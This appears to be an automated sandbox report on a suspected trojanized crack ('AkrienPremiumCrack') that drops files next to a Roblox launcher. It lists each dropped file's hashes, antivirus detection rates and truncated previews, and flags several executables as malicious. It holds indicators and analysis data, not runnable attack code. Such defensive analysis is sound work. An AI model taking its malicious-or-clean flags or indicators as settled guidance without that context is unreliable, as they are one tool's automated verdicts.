            SSDEEP:6:7DXBBLvbCVAIhI1ki/Z92o6P1nVRLK3G+1gEnG4QABceHGtsXgoPn:7LBB1cEd2xR7LK3h1gEnZQSHGtO
            MD5:A9CA56847D6D31609E2CE5DA2F53F398
            SHA1:BC1A2EFA9BB3FDB59AC0114BA6E160456E8C646D
            SHA-256:8A48FC750D03D0757FB7ABB15CE0896B7395B11E6569316C9A7A832D0B87AECE
            SHA-512:F3E4A184F5C5887D9EDB0447379FA58347A3C7F4FE3C59F406C4DAEBD070C261B46AAE69A85285F2402AEDA0FF95E5DAC8D83C375C1D504D3C82DDA1387EEC96
            Malicious:false
            Preview:CwDoafzVURx9ZgqkdQyIYnonJX9nl59Y8R0gfwHUyxQpcDR0blKdSg3YIZeDgMtZSZAIqKFqIdTlX9LGGJM9ufGbYbXFSEymD0XCCJKQfeVyMSAJOX7WAtpwTiuOwAYDorhgmIE695ePKRPFaO04HbmTLktdZ5deGRJfuegGTAXEPZlBToxiJd6NEOVBYlhDb9J3HuV6rukHEhEv8rJvI5VmU6afJfrscUnPQs4jS10Z3zIhKjCqbw5fogiKT0wMC2ou4yeQxkdQE6tfy2VkcARqYHluJtPcEoWALYnVEv30Tpa
            Process:C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Browserfont\refdhcp.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1740
            Entropy (8bit):5.36827240602657
            Encrypted:false
            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
            MD5:B28E0CCD25623D173B2EB29F3A99B9DD
            SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
            SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
            SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):163
            Entropy (8bit):4.51262152012362
            Encrypted:false
            SSDEEP:3:YztzMCJ/eH2xyWHf4JWyh2FJ3AENBFVIJthByWHfpPICmGHfpBQA7f/LCRzxo2py:Y19eHwQ4xFJ3vTuJtX9oQDV72VQ
            MD5:BEDBF7D7D69748886E9B48F45C75FBBE
            SHA1:AA0789D89BFBD44CA1BFFE83851AF95B6AFB012C
            SHA-256:B4A55CFD050F4A62B1C4831CA0AB6FFADDE1FE1C3F583917EADE12F8C6726F61
            SHA-512:7DDE268AF9A2C678BE8EC818EA4F12619ECC010CBA39B4998D833602B42DE505D36371393F33709C2ECA788BC8C93634A4FD6BEC29452098DBB2317F4C8847F6
            Malicious:false
            Preview:{"Version":"1.1","Content":{"Headers":[]},"StatusCode":"OK","ReasonPhrase":"OK","Headers":[],"TrailingHeaders":[],"RequestMessage":null,"IsSuccessStatusCode":true}
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):7220
            Entropy (8bit):5.107417667961366
            Encrypted:false
            SSDEEP:96:CcLGgml3nsqj/8YsCm02BXpQdZYqYIhvYsPOcWNCib7HZzeVuSFtJe1g1:Ccjml3ss8Y+XpsZKIZPOvQ67HFi/fes
            MD5:1A9ED330EFD69CE13F823DFE6E8D6951
            SHA1:CC8ED013E0A10925735DCF660A55DB5906041163
            SHA-256:9EA846CB3297FD53D83DCF708FAAA23839A485885853169CB525DAC559C7B486
            SHA-512:E26F41003C30840E5EB8D1ABB39C30C5242D3D7D84E88210DA596F8C4E9FB5C09D9BE76DCD1EBFA761C8207C29E3D14AF583379AE58E0D1DFAF0CD9D6D801515
            Malicious:false
            Preview:{"applicationSettings":{"DFStringHttpInfluxDatabase":"roblox_bootstrapper","FIntBootstrapperLaunchBehaviorABTest":"2","FIntInfluxReportExceptionPermyriad":"10000","UseCdn":"True","FFlagWindowsLaunchTypeAnalytics":"True","FFlagBootstrapperQuitOnDirectXExpiration":"True","FStringDisabledRobloxChannelList":"ZReleaseVS2019,Zfeatureboost_removal_test_in_prod,Zbugfixboost-mutex-revert,zfeaturehsr2cdnplaytest2,Zproject512-boost-remove-mutex-1,Zproject516-boost-remove-mutex-network,Zfeatureinstance-parent-weak-ptr,Zfeaturebaseline,Zfeatureinstance-parent-weak-ptr-2,Zfeaturetelemlife,Zfeaturefmod-20115,ZbugfixCLI-54676-test,Zfeaturesubsystematomic,ZbugfixCLI-55214-master,Zfeatureqt5.15,Zfeatureuse-new-rapidjson-in-flag-loading,Zfeaturefmod-recording-test,Zfeaturesubsystemhttpclient,Zfeaturesignalconcurrency,Zfeatureupgrade-lz4,Zxcode13release,ZQTitanStudioRelease,ZQTitanStudioReleaseHighDpi,Zfeatureprepare-shorelines4,zqtcanary,Zfeatureupgrade-libyuv-bento4,ZfeatureLUATOOLS-121-rbxpMoonbeamRele
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6010776
            Entropy (8bit):6.32462804770023
            Encrypted:false
            SSDEEP:98304:oSv4ntWoLPv8XcFqnlb3no0Fd7JxngykCN91s/CPUYY+Myu6K:FifLPFqDbjgyjs/C1YHytK
            MD5:442B78765B051E21BCF04E926B87079E
            SHA1:1A22CF8C593231A6963BF2A624BF105420D4DAE9
            SHA-256:4387634FEEB838CBF3156A553FF0914B3CBBC3369A1179A3C6FA57C58B755017
            SHA-512:DA2FB23108D05193776703ADDFAD8887FA8455E5A1DE441FA2A53D1DA6142559F19D1A64910D88643B73A23E12FA09B6CB04F3DF2AA007EDFE0A4ADB8175FEAA
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$........".vKC.%KC.%KC.%.1.$VC.%.1.$.C.%z.$%IC.%-,$%LC.%.6.$^C.%.6.$PC.%.6.$.C.%.1.$iC.%KC.%PC.%...$dA.%.6.$CC.%.6.$IC.%.6.$.C.%.1.$JC.%.1.$fC.%KC.%wA.%.6.$4C.%.6.$.C.%.6&%JC.%KCN%JC.%.6.$JC.%RichKC.%........................PE..L.....4..........."......j:..........4.......:...@..................................~\...@..................................J.........@6............[..)...........5H.p...................@6H......5H.@.............:..............................text....i:......j:................. ..`.rdata..x8....:..:...n:.............@..@.data.....~...J.......J.............@...CPADinfo(.............V.............@....rsrc...@6.......8....V.............@..@.reloc................X.............@..B........................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):82
            Entropy (8bit):4.485601323077016
            Encrypted:false
            SSDEEP:3:BE5KXp5LGDdN/9DZEHGBUvAAVMiqc:BIo5cdN/9DZu2UvZ7
            MD5:020688DBBE603E5E597E72D363C47E9F
            SHA1:C4DD1970A5FC79C956779BB1C9C3901EB3CED356
            SHA-256:8134540F2D005B02845D4445FE748737A9103D25B152AEED6856703073358E96
            SHA-512:62B603AF381DFF39F3A6848AA27BB3EBAFD4098857A4967C99FF8260887A2D41AB22C51EA9C672B8905C28AA731F0A27CA58841204536EC31B53A0FCA2FEA4D6
            Malicious:false
            Preview:v0..RobloxPlayerLauncher.exe..442b78765b051e21bcf04e926b87079e..6010776..6010776..
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):163
            Entropy (8bit):4.51262152012362
            Encrypted:false
            SSDEEP:3:YztzMCJ/eH2xyWHf4JWyh2FJ3AENBFVIJthByWHfpPICmGHfpBQA7f/LCRzxo2py:Y19eHwQ4xFJ3vTuJtX9oQDV72VQ
            MD5:BEDBF7D7D69748886E9B48F45C75FBBE
            SHA1:AA0789D89BFBD44CA1BFFE83851AF95B6AFB012C
            SHA-256:B4A55CFD050F4A62B1C4831CA0AB6FFADDE1FE1C3F583917EADE12F8C6726F61
            SHA-512:7DDE268AF9A2C678BE8EC818EA4F12619ECC010CBA39B4998D833602B42DE505D36371393F33709C2ECA788BC8C93634A4FD6BEC29452098DBB2317F4C8847F6
            Malicious:false
            Preview:{"Version":"1.1","Content":{"Headers":[]},"StatusCode":"OK","ReasonPhrase":"OK","Headers":[],"TrailingHeaders":[],"RequestMessage":null,"IsSuccessStatusCode":true}
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            File Type:HTML document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):167
            Entropy (8bit):4.43745738033235
            Encrypted:false
            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLGWbRIwcWWGu:q43tISl6kXiMIWSU6XlI55bRIpfGu
            MD5:0104C301C5E02BD6148B8703D19B3A73
            SHA1:7436E0B4B1F8C222C38069890B75FA2BAF9CA620
            SHA-256:446A6087825FA73EADB045E5A2E9E2ADF7DF241B571228187728191D961DDA1F
            SHA-512:84427B656A6234A651A6D8285C103645B861A18A6C5AF4ABB5CB4F3BEB5A4F0DF4A74603A0896C7608790FBB886DC40508E92D5709F44DCA05DD46C8316D15BF
            Malicious:false
            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>cloudflare</center>..</body>..</html>..
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):83
            Entropy (8bit):4.527855848489682
            Encrypted:false
            SSDEEP:3:BE5KXsiigXLNocwWT5TtklRgHFHQDYsQTUsn:BIlgXL60TEuVsQYsn
            MD5:587AAB2EAB1CD54D3821F17DA6F75117
            SHA1:9D3406D301E9826B4358B6DEE9FA3AABAF3508AA
            SHA-256:4C8AB5DB7C2B45DEB80B9525B2AB4015214756F76654CE598721316ED57D72B8
            SHA-512:EABD2265F56789286489AB876065769CD89EAE848F3DB475B63ECE4CC7E5933C74076B94597B3B9761D6AAFF1427250D32149C8574FECC7E75DF70E549CAFB02
            Malicious:false
            Preview:v0..RobloxPlayerInstaller.exe..cfefb36838560b726b44c5eb64bc55f6..5612440..5612440..
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):163
            Entropy (8bit):4.51262152012362
            Encrypted:false
            SSDEEP:3:YztzMCJ/eH2xyWHf4JWyh2FJ3AENBFVIJthByWHfpPICmGHfpBQA7f/LCRzxo2py:Y19eHwQ4xFJ3vTuJtX9oQDV72VQ
            MD5:BEDBF7D7D69748886E9B48F45C75FBBE
            SHA1:AA0789D89BFBD44CA1BFFE83851AF95B6AFB012C
            SHA-256:B4A55CFD050F4A62B1C4831CA0AB6FFADDE1FE1C3F583917EADE12F8C6726F61
            SHA-512:7DDE268AF9A2C678BE8EC818EA4F12619ECC010CBA39B4998D833602B42DE505D36371393F33709C2ECA788BC8C93634A4FD6BEC29452098DBB2317F4C8847F6
            Malicious:false
            Preview:{"Version":"1.1","Content":{"Headers":[]},"StatusCode":"OK","ReasonPhrase":"OK","Headers":[],"TrailingHeaders":[],"RequestMessage":null,"IsSuccessStatusCode":true}
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):71
            Entropy (8bit):5.251515605267819
            Encrypted:false
            SSDEEP:3:gRPcBMiXYIJ9wSIwyQVKr/2wX8:gpiIIJpbDVc8
            MD5:7752A528CE6A823C90988B21146AE56F
            SHA1:CD87BAF8C79916B0C05BB365AABA618888B55F46
            SHA-256:2C606599F561A81A07829B2BB22D626CC57D4C856EBED1A743ECDA37F0E31FFD
            SHA-512:2616CC3149182B24B11DFEBA98B95C8A104994048DD15995D891FD4A8AAB0F683CCBA1D1F2027F7BE0954463AB7AC6AAF37B928E886AC0D9EEFB80310CD023AE
            Malicious:false
            Preview:Uptodate<|>$2y$12$KynFldaK.a7uFhslutJMXu50sJt.8rdiNgLlvH1pRUh9QMrLqzvnm
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1545
            Entropy (8bit):4.840470105762514
            Encrypted:false
            SSDEEP:24:uRCLWaO+rvpPj2gM9od/u78CWqkt0JJTqHQwg4FPYP0DOd:QgBO+DpPJMod/u7BWqrq/KWW
            MD5:A410F50F0C11CB176878D011A07C2667
            SHA1:5073F2951E17402DDE44938C49071317475A45F6
            SHA-256:921309BC0C4F5BEFCD3C44362D8898845228063D502A0F6DA2EF48D741547AAD
            SHA-512:F9C89B45A7532F1833B714D79A446A98EA82A7D2B1B3A3A1F582F1232DFE86F81A2B212D28A2D09E1AA45B245792B32DAA9298945BF4A82273A5B7ACBF72622F
            Malicious:false
            Preview:v0..RobloxApp.zip..21f605090ff1fbcde0a532ac69778363..81794159..114217890..content-avatar.zip..b749dd29dc803ae8ad46991f5e1af1b9..396652..1152321..content-configs.zip..8ef21fd079ba958b7dee057b8c6a76bd..90030..625788..content-fonts.zip..c99b86e40e5f8444f2c354b8765b5d05..6780428..13737215..content-models.zip..a94b6d53eea3ae5600fc749c1a0bd8cc..488968..1559324..content-sky.zip..1d0390337d1a4a58e5514be1a9481ad6..2448711..4304365..content-sounds.zip..cd77e0e77d698260809f8ae8b3993740..373629..393784..shaders.zip..37803e446eee6fc031cd3f297ea7d085..9317298..55501832..ssl.zip..43c726b04ccfad6eb95e7ee2c25b33f0..133126..233235..content-textures2.zip..24c19f98d81b49479f07c330ed96be57..9712485..10686532..content-textures3.zip..909f4b9d7bc03a926d35e84d0c99ffbf..3713218..8777652..content-terrain.zip..b4b75c21ce05378163042dc45cec5834..3267..26109..content-platform-fonts.zip..8f379ec2b22ff106b837d79f7fdbf0d8..13686751..16427228..extracontent-places.zip..f1fc58812708be0be15089d46d659e3b..1038899..1464709..
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):163
            Entropy (8bit):4.51262152012362
            Encrypted:false
            SSDEEP:3:YztzMCJ/eH2xyWHf4JWyh2FJ3AENBFVIJthByWHfpPICmGHfpBQA7f/LCRzxo2py:Y19eHwQ4xFJ3vTuJtX9oQDV72VQ
            MD5:BEDBF7D7D69748886E9B48F45C75FBBE
            SHA1:AA0789D89BFBD44CA1BFFE83851AF95B6AFB012C
            SHA-256:B4A55CFD050F4A62B1C4831CA0AB6FFADDE1FE1C3F583917EADE12F8C6726F61
            SHA-512:7DDE268AF9A2C678BE8EC818EA4F12619ECC010CBA39B4998D833602B42DE505D36371393F33709C2ECA788BC8C93634A4FD6BEC29452098DBB2317F4C8847F6
            Malicious:false
            Preview:{"Version":"1.1","Content":{"Headers":[]},"StatusCode":"OK","ReasonPhrase":"OK","Headers":[],"TrailingHeaders":[],"RequestMessage":null,"IsSuccessStatusCode":true}
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):163
            Entropy (8bit):4.51262152012362
            Encrypted:false
            SSDEEP:3:YztzMCJ/eH2xyWHf4JWyh2FJ3AENBFVIJthByWHfpPICmGHfpBQA7f/LCRzxo2py:Y19eHwQ4xFJ3vTuJtX9oQDV72VQ
            MD5:BEDBF7D7D69748886E9B48F45C75FBBE
            SHA1:AA0789D89BFBD44CA1BFFE83851AF95B6AFB012C
            SHA-256:B4A55CFD050F4A62B1C4831CA0AB6FFADDE1FE1C3F583917EADE12F8C6726F61
            SHA-512:7DDE268AF9A2C678BE8EC818EA4F12619ECC010CBA39B4998D833602B42DE505D36371393F33709C2ECA788BC8C93634A4FD6BEC29452098DBB2317F4C8847F6
            Malicious:false
            Preview:{"Version":"1.1","Content":{"Headers":[]},"StatusCode":"OK","ReasonPhrase":"OK","Headers":[],"TrailingHeaders":[],"RequestMessage":null,"IsSuccessStatusCode":true}
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):119
            Entropy (8bit):4.763774331778645
            Encrypted:false
            SSDEEP:3:YTyLSNLTG5qvqdBtTT8+gEcPMLVX9n:YWLSNEqvqD18+gEACr
            MD5:6307BA5EA757079830A048CA05D29022
            SHA1:94625B729C89C99B7FEC68F80FD7D43A410A5BC2
            SHA-256:4DD63B8E839D53626AF540214059C5C8A4711A257BA8C65C0F7367DAC6D3750E
            SHA-512:3DF23008908E788E80247AF0335BCB93B10DED4A01F4039E070BA19EBBF6AA32EAF27E78E4F3FCFA0A4EFBAC6F7BCE583A7D5BA5A8F811C6D7BEC129262EC457
            Malicious:false
            Preview:{"version":"0.627.0.6270453","clientVersionUpload":"version-d6abc3b106a04c5c","bootstrapperVersion":"1, 6, 0, 6270453"}
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):7484
            Entropy (8bit):5.09879392286895
            Encrypted:false
            SSDEEP:192:Ccjml3ss8Y+XpsZKIZPOvQ67HFi/femqI1Ggo:Ccjss/YFzBIHFl
            MD5:2159EC9662034C5001998FD3EDC80F7E
            SHA1:E37F9D9A270C2E39C631789364C036B6A5E20B64
            SHA-256:86CD357D926D8EF2552ECCAA8C4B7B0680377703276029E9DA7B9C3A388A4E17
            SHA-512:8CB299BADD0B9096EC50F8FC9B4CEC89A257CC81B238EF8612D8ED26800AEB20F980EA3DFE66E3866AB360A4503ADFE589370C4CD07A44F49FC9AA8449B877CA
            Malicious:false
            Preview:{"applicationSettings":{"DFStringHttpInfluxDatabase":"roblox_bootstrapper","FIntBootstrapperLaunchBehaviorABTest":"2","FIntInfluxReportExceptionPermyriad":"10000","UseCdn":"True","FFlagWindowsLaunchTypeAnalytics":"True","FFlagBootstrapperQuitOnDirectXExpiration":"True","FStringDisabledRobloxChannelList":"ZReleaseVS2019,Zfeatureboost_removal_test_in_prod,Zbugfixboost-mutex-revert,zfeaturehsr2cdnplaytest2,Zproject512-boost-remove-mutex-1,Zproject516-boost-remove-mutex-network,Zfeatureinstance-parent-weak-ptr,Zfeaturebaseline,Zfeatureinstance-parent-weak-ptr-2,Zfeaturetelemlife,Zfeaturefmod-20115,ZbugfixCLI-54676-test,Zfeaturesubsystematomic,ZbugfixCLI-55214-master,Zfeatureqt5.15,Zfeatureuse-new-rapidjson-in-flag-loading,Zfeaturefmod-recording-test,Zfeaturesubsystemhttpclient,Zfeaturesignalconcurrency,Zfeatureupgrade-lz4,Zxcode13release,ZQTitanStudioRelease,ZQTitanStudioReleaseHighDpi,Zfeatureprepare-shorelines4,zqtcanary,Zfeatureupgrade-libyuv-bento4,ZfeatureLUATOOLS-121-rbxpMoonbeamRele
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):1164347
            Entropy (8bit):6.3732407696299695
            Encrypted:false
            SSDEEP:24576:U2G/nvxW3Ww0tLpTjXIzPkxnXX6WAHOcaiOGdMo:UbA30hXN0b7
            MD5:F01B45525A3718CEEDFCC788392DFE50
            SHA1:60C7511E1D09B5E8E0B206FE23481508C84668DA
            SHA-256:D37AA66005E6123A219328759E079126CE5AD078E0AD72041C7047309DAF0455
            SHA-512:3FEF7E790AD743045BB7140A33780346195C101CFCFB04C44FFB96B34DC455985ACEC13E487E1360FAE73709A9A5FDB300123B3EA9E5979AA88464E59A9E8DC5
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 75%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe
            File Type:PE32+ executable (GUI) x86-64, for MS Windows
            Category:dropped
            Size (bytes):9388032
            Entropy (8bit):7.958837487895641
            Encrypted:false
            SSDEEP:196608:3m7O9QpzcfPkdpnW55tU54pPWxcSp202aoe3B:3CO26Ap74pPsckt
            MD5:830511D481D3B0D9E73F8475159EBEE3
            SHA1:B1E8C1FF729BEE0B8B25030AD93C8076AE455912
            SHA-256:11FF80946D298ED531925658F63FD09DFB3A9D6C4A36CEE57BBE569B9E378BE4
            SHA-512:36286BEBD361D66DC7213DAD9D09B218A98A3CF756D22962C5992ED67B86099C9865A3F7C2B5B240FFEE87EC9C273454314F08DF51410F0F916C38209AB4D199
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 53%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....y.a..........#......r...>................@.......................................... ............................................O.......,...........p....0..............................................0...0...8...............@............................text...lq.......................... ..`.rdata..P...........................@..@.data........ ......................@....pdata..............................@..@_RDATA..............................@..@.akr0.....h.........................`..`.akr1... 9.......:..................`..h.rsrc................>..............@..@................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\RFAwChXSve.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):10172928
            Entropy (8bit):7.994948859417295
            Encrypted:true
            SSDEEP:196608:c5VxEPkreyTNrHxwGtoMC7i2xbsdLKmaHnIdKQLd9/0R:cxZN7eGk7V1sdLugH8R
            MD5:C4546882C186DC99C68501D0DB7FBB21
            SHA1:A1DF487276491F98A4DB7171F397D6A30375EE6D
            SHA-256:45F4D4B64E6A1CA96E51AEC35BEA9BDB72EB950E9810F1CBB95976DBF379089B
            SHA-512:BB340FC4573EF9E0692FA6AF31D8B1751DCBA1C5FE3BB1C0CDB7282316B06C4059D49047E8BBA24E8A6ABC624A4E12AD85FB2C77FCE24A9FCFB4A90E8BF49F89
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.N.....................(............... ....@..........................0............................................... ..P.................................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with very long lines (1022), with CRLF line terminators
            Category:dropped
            Size (bytes):24189
            Entropy (8bit):5.5359929851911
            Encrypted:false
            SSDEEP:384:AIIyRFcjssp1VGh1vX3FhXuXEvxzGOOxxB7xH/yxPOinpRHT7zBi:AIIi+x1Q/vnFFu0vxzGnxxB7xH/yxPO5
            MD5:225AED4606AA8C67F04AC15586E980BB
            SHA1:25D81D8D194D95D959B5800E7145E020C4C641CD
            SHA-256:BBEBDAB04A8535EC39CD27B1F25A47CA4668291BE9B01039DF8276FDF849B3D9
            SHA-512:2F3A7507773CA92442FE52A5186A5371C3A3287658859E69FA077D2D943A718D80D3CDB5D8574216ABF3EFFE36441CE15F169DFFBAC7ECEFF678985729A96518
            Malicious:false
            Preview:2024-05-31 00:57:07.740 UTC..2024-05-31T00:57:07.009Z,0.009413,0bbc,6 [FLog::Output] RobloxGitHash: cd8f60aa5fd1b833d79957e664b9bd42f71216a2..2024-05-31T00:57:07.023Z,0.023307,0bbc,6 [FLog::Output] Bootstrapper::Bootstrapper..2024-05-31T00:57:07.023Z,0.023361,0bbc,6 [FLog::Output] Bootstrapper::Bootstrapper..2024-05-31T00:57:07.023Z,0.023381,0bbc,6 [FLog::Output] Main threadID 3004..2024-05-31T00:57:07.023Z,0.023405,0bbc,6 [FLog::Output] Start time: 05-31-2024 00:57:07..2024-05-31T00:57:07.023Z,0.023428,0bbc,6 [FLog::Output] installHost: setup.roblox.com..2024-05-31T00:57:07.023Z,0.023446,0bbc,6 [FLog::Output] baseHost: www.roblox.com..2024-05-31T00:57:07.024Z,0.024146,0bbc,6 [FLog::Output] flavor: VANILLA..2024-05-31T00:57:07.024Z,0.024165,0bbc,6 [FLog::Output] The embedded channel is NONE..2024-05-31T00:57:07.024Z,0.024175,0bbc,6 [FLog::Output] BootstrapperClient::BootstrapperClient..2024-05-31T00:57:07.024Z,0.024489,0bbc,6 [FLog::Output] Bootstrapper::parseCmdLine params count = 1..
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:ASCII text, with very long lines (1022), with CRLF line terminators
            Category:dropped
            Size (bytes):8899
            Entropy (8bit):5.523732047763863
            Encrypted:false
            SSDEEP:192:mdW0cMh+726JaJ9Fcjml3szo/7R9p2cjml3sE3jGGri:BHMgyTFcjsszgB2cjssgjjri
            MD5:DEB990C9680A6B1EF88DF1F2F826BAE5
            SHA1:97E0D1DCDCFE198BF123D5608C53B7AE7C4E8326
            SHA-256:EC28C3D8A1F1BA7739FEB68681F6F87900165F877589CE7238D0A5AACF2A7B18
            SHA-512:398ABBEF8044F7D71022B59BD40BEE20DBE64C52C9AF9CE4ADDB4E77F154FD75FBB2AC836D0BA83D748C2FA2A1D2DF6922993F8AC2658F570C7BCCD258524BB4
            Malicious:false
